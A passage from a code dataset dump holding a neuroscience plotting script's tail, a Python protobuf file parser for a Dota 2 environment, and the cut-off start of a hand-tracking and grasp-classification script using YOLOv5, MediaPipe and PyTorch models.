bottom=cortcountsID,\n linewidth=linewidth)\n\nplt.xlabel('Maximum AM rate to which responses\\nwere synchronized (Hz)', fontsize=fontsize)\nplt.ylabel('% Neurons', fontsize=fontsize)\n# plt.title('Scores by group and gender')\nplt.xticks(index + bar_width, freqs)\nplt.legend(loc='upper left', prop={'size':15})\nplt.tight_layout()\nax = 
plt.gca()\nax.set_yticks(np.linspace(0, 40, 5))\nextraplots.set_ticks_fontsize(ax, fontsize)\nextraplots.boxoff(ax)\n\nplt.show()\n\n# Dependence of mean FR on AM rate\n# thalamR = thalCells['amRval']\n# cortamR = cortCells['amRval']\n# plt.clf()\n# plt.plot(np.random.normal(1, 0.05, len(thalamR.dropna())), thalamR.dropna(), '.', ms=10)\n# plt.hold(True)\n# plt.plot(np.random.normal(3, 0.05, len(cortamR.dropna())), cortamR.dropna(), '.', ms=10)\n# plt.xlim([0.5, 3.5])\n# ax = plt.gca()\n# ax.set_xticks([1, 3])\n# ax.set_xticklabels(['Thalamus', 'Cortex'])\n# plt.ylabel('Correlation coefficient between\\nfiring rate and AM rate')\n# plt.show()\n\n### EXAMPLE NEURON HUNT\n# corrCells = thalCells[np.abs(thalCells['amRval'])>0.5]\n# corrCells = cortCells[np.abs(cortCells['amRval'])>0.5]\n\n# for indCell, cell in corrCells.iterrows():\n# plt.clf()\n# try:\n# sessiontypeIndex = cell['sessiontype'].index('AM')\n# except ValueError: #The cell does not have this session type\n# continue\n# print indCell\n# # r_val, frArray = am_funcs.am_dependence(cell, frArray=True)\n# # plt.plot(frArray)\n# # plt.waitforbuttonpress()\n# plt.subplot(3, 1, 1)\n# am_funcs.plot_am_raster(cell)\n# plt.subplot(3, 1, 2)\n# am_funcs.plot_am_psth(cell)\n# plt.subplot(3, 1, 3)\n# r_val, frArray, possibleFreq = am_funcs.am_dependence(cell, frArray=True)\n# plt.plot(frArray)\n# ax = plt.gca()\n# ax.set_xticks(np.arange(len(possibleFreq)))\n# ax.set_xticklabels(np.round(possibleFreq, decimals=1))\n# plt.xlabel(r_val)\n# plt.waitforbuttonpress()\n", "repo_name": "sjara/jaratest", "sub_path": "nick/analysis/poster_ephys/am_stats_plot.py", "file_name": "am_stats_plot.py", "file_ext": "py", "file_size_in_byte": 5693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "jaratest.nick.stats.am_funcs", "line_number": 4, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 78, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 78, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 79, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 87, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 95, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 95, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 104, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 115, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots.set_ticks_fontsize", "line_number": 116, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 116, "usage_type": "name"}, {"api_name": "jaratoolbox.extraplots.boxoff", "line_number": 117, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "36766905246", "text": "import logging\n\nlog = logging.getLogger(__name__)\n\n\nclass ProtoParser:\n def __init__(self, filename):\n with open(filename, 'r') as f:\n data = f.read()\n\n lines = data.split('\\n')\n tokens = []\n for line in lines:\n if line.startswith('//'):\n continue\n\n if line.startswith('syntax'):\n continue\n\n if line.startswith('option'):\n continue\n\n line = line.replace('\\t', ' ')\n tokens.extend(line.split(' '))\n\n self.tokens = []\n for t in tokens:\n if t not in ('', ' '):\n self.tokens.append(t)\n\n self.nested_message = []\n self.path = dict()\n self.old = dict()\n self.type_order = dict()\n self.type_array = []\n self.messages = []\n self.pos = 0\n\n def next(self):\n self.pos += 1\n return self.token()\n\n def token(self):\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n return None\n\n def has_tokens(self):\n return self.pos < len(self.tokens)\n\n def parse(self):\n while self.has_tokens():\n tok = self.token()\n\n if tok == 'message':\n self.parse_message()\n\n elif tok == 'enum':\n self.parse_enum()\n\n else:\n print(f'dont know how to parse `{tok}`')\n\n def parse_oneof(self):\n self.expect('oneof')\n name = self.next()\n\n self.next(), self.expect('{')\n fields = []\n\n tok = self.next()\n while tok != '}':\n fields.append(self.parse_field())\n tok = self.token()\n\n self.expect('}'), self.next()\n\n print(name, name in self.type_order)\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n self.messages.append(('O', name, fields))\n\n fname = name[0].lower() + name[1:]\n return 'F', 0, fname, name, ''\n\n def parse_field(self):\n qualifier = ''\n tok = self.token()\n\n if tok in ('optional', 'required', 'repeated'):\n qualifier = tok\n field_type = self.next() \n elif tok == 'oneof':\n return self.parse_oneof()\n else:\n field_type = tok\n \n field_name = self.next()\n\n self.next(), self.expect('=')\n field_id = self.next() \n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n # start of the [default ....]; stuff\n elif tok[0] == '[':\n tok = self.token()\n while tok[-1] != ';':\n tok = self.next()\n self.next()\n\n elif field_id[-1] == ';':\n field_id = field_id[:-1]\n\n new_name = field_type.split('.')[-1]\n if new_name not in self.type_order:\n self.type_order[new_name] = len(self.type_order)\n self.type_array.append(new_name)\n \n log.debug(f'parse field {qualifier} {field_name}: {field_type} = {field_id}')\n return 'F', field_id, field_name, field_type, qualifier\n\n def parse_enum_field(self):\n name = self.token()\n self.next(), self.expect('=')\n value = self.next()\n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n elif value[-1] == ';':\n value = value[:-1]\n\n return name, value\n\n def expect(self, c):\n t = self.token()\n assert t == c, f'Expected `{c}` got `{t}`'\n\n def parse_enum(self):\n self.expect('enum')\n name = self.next()\n\n log.debug(f'>> parsing enum {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' 
+ '.'.join(self.nested_message)\n\n tok = self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n fname, fvalue = self.parse_enum_field()\n fields.append((fname, fvalue))\n tok = self.token()\n\n self.expect('}'), self.next()\n self.messages.append(('E', name, fields))\n self.nested_message.pop()\n\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n def parse_message(self):\n self.expect('message')\n name = self.next()\n\n log.debug(f'>> parsing message {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n if tok == 'message':\n self.parse_message()\n tok = self.token()\n continue\n\n if tok == 'enum':\n self.parse_enum()\n tok = self.token()\n continue\n\n fields.append(self.parse_field())\n tok = self.token()\n \n self.expect('}'), self.next()\n self.nested_message.pop()\n self.messages.append(('M', name, fields))\n \n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n p = ProtoParser('C:/Users/Newton/work/luafun/luafun/game/dota2/dota_gcmessages_common_bot_script.proto')\n p.parse()\n print(p.messages)\n", "repo_name": "Delaunay/dota2env", "sub_path": "luafun/utils/proto_parser.py", "file_name": "proto_parser.py", "file_ext": "py", "file_size_in_byte": 5757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 213, "usage_type": "attribute"}]}
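Editor's note: a short usage sketch for the ProtoParser above — write a tiny .proto file and parse it (the Ping message is made up for illustration). Each parsed message lands in p.messages as an ('M', name, fields) tuple, with fields as ('F', id, name, type, qualifier) tuples:

import tempfile

proto_src = """
message Ping {
  required int32 id = 1;
  optional string note = 2;
}
"""

# Write the definition to a temp file, since ProtoParser reads from a path.
with tempfile.NamedTemporaryFile('w', suffix='.proto', delete=False) as f:
    f.write(proto_src)
    path = f.name

p = ProtoParser(path)
p.parse()
print(p.messages)
# [('M', 'Ping', [('F', '1', 'id', 'int32', 'required'),
#                 ('F', '2', 'note', 'string', 'optional')])]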
+{"seq_id": "30612429975", "text": "# Source :\r\n# https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data\r\n# https://github.com/nicknochnack/YOLO-Drowsiness-Detection/blob/main/Drowsiness%20Detection%20Tutorial.ipynb\r\n# https://github.com/tzutalin/labelImg\r\n\r\n\r\n# Label Image - \"myhand\" environment\r\n# -----------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\labelImg\r\n# python labelImg.py\r\n\r\n# YoLoV5 Training - \"mybrain\" environment\r\n# ---------------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\r\n# python train.py --img 320 --batch 16 --epochs 100 --data dataset.yaml --weights yolov5s.pt --workers 2\r\n\r\n\r\n#Install and Import Dependencies\r\n\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport math\r\nimport time\r\n\r\n# Create CSV file\r\nimport csv\r\n\r\nheader_ang = [ 'timer', 'timer_task', \r\n 'angle01', 'angle02', 'angle03', \r\n 'angle11', 'angle12', 'angle13',\r\n 'angle21', 'angle22', 'angle23', \r\n 'angle31', 'angle32', 'angle33',\r\n 'angle41', 'angle42', 'angle43', 'task_state', 'thumb_state', ] \r\n \r\ncsvfile_ang = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_angle.csv', 'w')\r\nwriter_ang = csv.writer(csvfile_ang, delimiter = ',', lineterminator='\\n')\r\nwriter_ang.writerow(header_ang)\r\n\r\nheader_sta = [ 'timer', 'timer_task', 'grasp_type', 'rotate_type', 'box_near_hand'] \r\n \r\ncsvfile_sta = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_status.csv', 'w')\r\nwriter_sta = csv.writer(csvfile_sta, delimiter = ',', lineterminator='\\n')\r\nwriter_sta.writerow(header_sta)\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP Graph Neural Networks\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn import Linear\r\n\r\ndataset_num_node_features = 1\r\ndataset_num_classes = 7\r\n\r\n# Training with GCNConv\r\nfrom torch_geometric.data import Data\r\n\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import global_mean_pool\r\n\r\n\"\"\"\"\"\"\r\nclass GCN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GCN, self).__init__()\r\n torch.manual_seed(12345)\r\n self.conv1 = GCNConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GCNConv(hidden_channels, hidden_channels)\r\n self.conv3 = GCNConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch): #\r\n # 1. Obtain node embeddings \r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n # 2. Readout layer\r\n x = global_mean_pool(x, batch) # [batch_size, hidden_channels]\r\n\r\n # 3. 
Apply a final classifier\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Training with GraphConv\r\n\r\nfrom torch_geometric.nn import GraphConv\r\n\r\nclass GNN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GNN, self).__init__()\r\n torch.manual_seed(12345)\r\n\r\n self.conv1 = GraphConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GraphConv(hidden_channels, hidden_channels)\r\n self.conv3 = GraphConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch):\r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n x = global_mean_pool(x, batch)\r\n\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Device configuration\r\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\n\r\n# Defining ANN Architechture\r\nmodel_gnn = GNN(hidden_channels=64)\r\nmodel_gnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_grasppose_gnn.pkl\"))\r\nmodel_gnn.to(device)\r\nmodel_gnn.eval()\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model_gnn.parameters(), lr=0.01)\r\n\r\n# Data Preprocessing\r\nedge_index = torch.tensor([[0, 1], #[1, 0],\r\n [1, 2], #[2, 1],\r\n [2, 3], #[3, 2],\r\n [0, 4], #[4, 0],\r\n [4, 5], #[5, 4],\r\n [5, 6], #[6, 5],\r\n [0, 7], #[7, 0],\r\n [7, 8], #[8, 7],\r\n [8, 9], #[9, 8],\r\n [0, 10], #[10, 0],\r\n [10, 11], #[11, 10],\r\n [11, 12], #[12, 11],\r\n [0, 13], #[13, 0],\r\n [13, 14], #[14, 13],\r\n [14, 15] #[15, 14] \r\n ],dtype=torch.long)\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP NEURAL NETWORKS RNN\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass RNN(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\r\n super(RNN, self).__init__()\r\n self.num_layers = num_layers\r\n self.hidden_size = hidden_size\r\n\r\n # -> x needs to be: (batch_size, seq, input_size)\r\n\r\n #self.rnn = nn.RNN(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< RNN\r\n # or:\r\n self.gru = nn.GRU(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< GRU\r\n #self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< LSTM\r\n \r\n self.fc = nn.Linear(hidden_size, num_classes)\r\n \r\n def forward(self, x):\r\n # Set initial hidden states (and cell states for LSTM)\r\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) \r\n #c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) # <<<<<<<<<<< LSTM\r\n \r\n # x: (n, 28, 28), h0: (2, n, 128)\r\n \r\n # Forward propagate RNN\r\n #out, _ = self.rnn(x, h0) # <<<<<<<<<<< RNN\r\n # or:\r\n #out, _ = self.lstm(x, (h0,c0)) # <<<<<<<<<<< LSTM\r\n # or:\r\n out, _ = self.gru(x, h0) # <<<<<<<<<<< GRU\r\n \r\n # out: tensor of shape (batch_size, seq_length, hidden_size)\r\n # out: (n, 28, 128)\r\n \r\n # Decode the hidden state of the last time step\r\n out = out[:, -1, :]\r\n # out: (n, 128)\r\n \r\n out = self.fc(out)\r\n # out: (n, 10)\r\n return out\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters 
\r\nnum_classes = 7\r\nnum_epochs = 50\r\nbatch_size = 1\r\nlearning_rate = 0.001\r\n\r\ninput_size = 15\r\nsequence_length = 10\r\nhidden_size = 128\r\nnum_layers = 2\r\n\r\n# Defining ANN Architechture\r\nmodel_rnn = RNN(input_size, hidden_size, num_layers, num_classes).to(device)\r\nmodel_rnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_gru.pkl\"))\r\nmodel_rnn.to(device)\r\nmodel_rnn.eval()\r\n\r\nimport collections\r\ncoll_hand = collections.deque(maxlen=sequence_length)\r\n\r\nimport pickle\r\nsc_input = pickle.load(open(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\scaler_input.pkl\",'rb'))\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HAND TRACKING : MEDIAPIPE\r\n\r\n### HAND TRACKING: SETUP\r\n\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\njoint_list_0 = [[2,1,0], [3,2,1], [4,3,2]]\r\njoint_list_1 = [[6,5,0], [7,6,5], [8,7,6]]\r\njoint_list_2 = [[10,9,0], [11,10,9], [12,11,10]]\r\njoint_list_3 = [[14,13,0], [15,14,13], [16,15,14]]\r\njoint_list_4 = [[18,17,0], [19,18,17], [20,19,18]]\r\n\r\n### HAND TRACKING: FUCTION \r\n\r\ndef get_label(index, hand, results):\r\n output = None\r\n for idx, classification in enumerate(results.multi_handedness):\r\n if classification.classification[0].index == index:\r\n \r\n # Process results\r\n label = classification.classification[0].label\r\n score = classification.classification[0].score\r\n text = '{} {}'.format(label, round(score, 2))\r\n \r\n # Extract Coordinates\r\n coords = tuple(np.multiply(\r\n np.array((hand.landmark[mp_hands.HandLandmark.WRIST].x, hand.landmark[mp_hands.HandLandmark.WRIST].y)),\r\n [640,480]).astype(int))\r\n \r\n output = text, coords\r\n \r\n return output\r\n\r\n\r\n\r\ndef draw_finger_angles(image, results, joint_list):\r\n \r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n for joint in joint_list:\r\n\r\n point = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y])\r\n \r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n\r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n if angle > 180.0:\r\n angle = 360-angle\r\n \r\n cv2.putText(image, str(round(angle, 2)), tuple(np.multiply(point, [1920, 1080]).astype(int)),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (50, 50, 50), 1, cv2.LINE_AA)\r\n return image\r\n\r\n\r\ndef get_finger_angles(results, joint_list):\r\n \r\n finger_angles=[]\r\n\r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n \r\n joint_no = 1\r\n for joint in joint_list:\r\n\r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, 
hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n \r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n #if joint_no == 1 and angle < 90 :\r\n # angle = 90\r\n #elif joint_no == 2 and angle < 110 :\r\n # angle = 110\r\n #elif joint_no == 3 and angle < 90 :\r\n # angle = 90\r\n \r\n joint_no = joint_no + 1\r\n finger_angles.append(round(angle, 2))\r\n\r\n return finger_angles\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Model and File\r\n\r\n# Load Model\r\nPATH_MODEL = r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\\runs\\train\\exp7\\weights\\best.pt\"\r\nmodel_yolo = torch.hub.load(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5', 'custom', path=PATH_MODEL, force_reload=True, source='local')\r\n\r\n#model_yolo = torch.hub.load('ultralytics/yolov5', 'custom', path=PATH_MODEL, force_reload=True)\r\n\r\n\r\n# Make Detection\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\original\\01_top.mp4\" #top_view.mp4 tes03x\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\reduce\\03_top.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_GESTURE\\TUMB\\down_02.mp4\"\r\n\r\nPATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\TLL\\TOP_VIEW\\anom_01.mp4\"\r\n\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Block_Grasping.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Rotation\\GRASP\\4.mp4\"\r\n\r\ncap = cv2.VideoCapture(PATH_VIDEO) # PATH_VIDEO 0\r\n\r\ncv2.namedWindow('Stream',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('Stream', (960,540) ) #(960,540) (640,480)\r\n\r\nface_01 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\01.png\", cv2.IMREAD_COLOR)\r\nface_02 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\02.png\", cv2.IMREAD_COLOR)\r\nface_03 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\03.png\", cv2.IMREAD_COLOR)\r\nface_04 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\04.png\", cv2.IMREAD_COLOR)\r\nface_05 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\05.png\", cv2.IMREAD_COLOR)\r\nface_06 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\06.png\", cv2.IMREAD_COLOR)\r\n\r\n#size = 40\r\n#face_01 = cv2.resize(face_01, (size, size))\r\n#face_02 = cv2.resize(face_02, (size, size))\r\n#face_03 = cv2.resize(face_03, (size, size))\r\n#face_04 = cv2.resize(face_04, (size, size))\r\n#face_05 = cv2.resize(face_05, (size, size))\r\n#face_06 = cv2.resize(face_06, (size, size))\r\n\r\ngray_face_01 = cv2.cvtColor(face_01, cv2.COLOR_BGR2GRAY)\r\ngray_face_02 = cv2.cvtColor(face_02, cv2.COLOR_BGR2GRAY)\r\ngray_face_03 = cv2.cvtColor(face_03, cv2.COLOR_BGR2GRAY)\r\ngray_face_04 = cv2.cvtColor(face_04, cv2.COLOR_BGR2GRAY)\r\ngray_face_05 = cv2.cvtColor(face_05, cv2.COLOR_BGR2GRAY)\r\ngray_face_06 = cv2.cvtColor(face_06, cv2.COLOR_BGR2GRAY)\r\n\r\nret_01, mask_face_01 = cv2.threshold(gray_face_01, 1, 255, cv2.THRESH_BINARY)\r\nret_02, 
